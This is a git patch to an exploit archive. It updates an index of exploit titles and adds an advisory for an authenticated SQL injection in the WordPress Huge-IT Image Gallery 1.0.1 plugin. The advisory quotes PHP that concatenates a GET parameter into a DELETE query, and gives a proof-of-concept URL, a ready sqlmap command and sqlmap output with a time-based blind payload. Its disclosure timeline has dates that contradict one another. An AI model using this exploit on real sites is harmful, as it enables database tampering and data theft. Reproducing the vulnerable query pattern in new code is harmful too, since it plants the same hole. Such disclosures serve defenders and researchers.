From dd650d9bb98b1dd7db2ed31452f468fcc5687a09 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 4 Sep 2014 04:43:14 +0000 Subject: [PATCH] Updated 09_04_2014 --- files.csv | 5 +- platforms/php/webapps/34524.txt | 94 +++++++++++++++++++++++++++++++++ 2 files changed, 97 insertions(+), 2 deletions(-) create mode 100755 platforms/php/webapps/34524.txt diff --git a/files.csv b/files.csv index 40d157489..72b6ed4ae 100755 --- a/files.csv +++ b/files.csv @@ -15784,7 +15784,7 @@ id,file,description,date,author,platform,type,port 18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 -18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 +18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 @@ -31088,8 +31088,9 @@ id,file,description,date,author,platform,type,port 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 -34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 +34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0 34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 +34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 diff --git a/platforms/php/webapps/34524.txt b/platforms/php/webapps/34524.txt new file mode 100755 index 000000000..f0eef8ce2 --- /dev/null +++ b/platforms/php/webapps/34524.txt @@ -0,0 +1,94 @@ +###################### +# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://huge-it.com/ + +# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip + Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs + +# Date : 2014-08-25 + +# Tested on : Windows 7 / Mozilla Firefox +# Linux / Mozilla Firefox +# Linux / sqlmap 1.0-dev-5b2ded0 + +###################### + +# Location : +http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php + +###################### + +# Vulnerable code : + +function editgallery($id) + { + + global $wpdb; + + if(isset($_GET["removeslide"])){ + if($_GET["removeslide"] != ''){ + + + $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." "); + + + + } + } + +###################### + +# PoC Exploit: + +http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2 + + +# Exploit Code via sqlmap: + +sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \ +-p removeslide --dbms=mysql --level 3 + +[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable +... +... +... +--- +Place: GET +Parameter: removeslide + Type: AND/OR time-based blind + Title: MySQL >= 5.0 time-based blind - Parameter replace + Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) +--- + + +# PoC Video: + +https://www.youtube.com/watch?v=gAmb0_o3ZUc + +###################### + +# Vulnerability Disclosure Timeline: + +2014-08-25: Discovered vulnerability +2014-08-26: Vendor Notification (Web Customers Service Form) +2014-08-26: No Response/Feedback +2014-08-01: Plugin version 1.0.1 released without fix +2014-08-02: Public Disclosure + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### \ No newline at end of file